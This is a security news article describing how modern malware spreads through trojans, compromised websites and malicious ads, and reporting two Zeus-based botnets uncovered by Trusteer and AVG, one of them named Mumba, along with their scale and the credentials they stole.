Modern Malware – 2 New Zeus-2 Botnets

Today’s malware differs dramatically from the threats we faced just a few years ago, when most malicious programs were written to earn online bragging rights.  Malware made the user aware of its existence through a displayed message, music (as in the Yankee Doodle Dandy virus family), some sort of harmless mischief, or worst case, by wiping out a hard drive. Those were the good old days.

Modern malware is written by professional criminals.  In most cases, users are tricked into executing a malicious Trojan horse program (a program often disguised as or hidden inside of another program) carrying or making way for and downloading the real payload.  Users think they are installing needed or desirable software, often “recommended” by a site that they trust.  Malware producers routinely break into legitimate websites using commonly known vulnerabilities and modify Web pages to include malicious JavaScript redirects.  Malicious code can even be hidden inside a banner ad on a website, supplied by legitimate ad services and distributed to a wide array of legitimate sites.  When the user surfs to the legitimate website, the malicious JavaScript is loaded, prompting the user to install a program or redirecting the unknowing user to another website where they are told to install a necessary program, codec, software update or patch.

Zeus is a piece of malicious software that contains botnet (connected and remotely controlled computer systems) and financial theft capabilities is a Trojan horse program that spreads other bot agents and malware components quickly, can be adapted for multiple purposes, is available in simple botnet-building kits, and serves as the platform for a growing number of botnets being exploited across the globe, according to experts.  In the past few days, researchers at Trusteer and AVG revealed details about two new instances of Zeus-based botnets, suggesting the Trojan kit is becoming more popular with online criminals and prolific than ever.

Trusteer announced it uncovered a large Zeus version 2 botnet that is operated and controlled from Eastern Europe and is used to conduct financial fraud in the U.K.  The botnet appears to be controlling more than 100,000 infected computers, 98% are U.K. Internet users.  The criminals have been harvesting all manner of potentially lucrative and revenue-producing credentials, including online account IDs, bank login information, credit and debit card numbers, account types and balances, bank statements, browser cookies, client side certificates, login information for email accounts and social networks, and even FTP passwords.  Trusteer discovered the extent of the botnet after gaining access to the botnet’s information drop servers and command and control center, which contained “hundreds of thousands” of stolen credentials.  By harvesting client-side certificates and cookies, the cybercriminals can extract a lot of extra information on the user that can be used to augment their illegal access to those users’ online accounts.

Separately, researchers at AVG released a white paper (PDF) that outlines details on Mumba, a new Zeus-based botnet that immediately infected more than 35,000 computers when it launched in April.  The botnet has now collected at least 60 GB of information from some 55,000 computers, half of which are in the U.K. and Germany, according to an AVG analysis of a server that was used to collect the data.  The Mumba botnet is probably controlled by the Avalanche Group, which specializes in phishing sites and malware.  It uses at least four different variants of Zeus, which can be adapted to send spam, steal financial information, or spread malware.  The Mumba botnet is probably one of the first to use the Avalanche operation in order to host its stolen goods as well as the malware infection, the white paper says. ”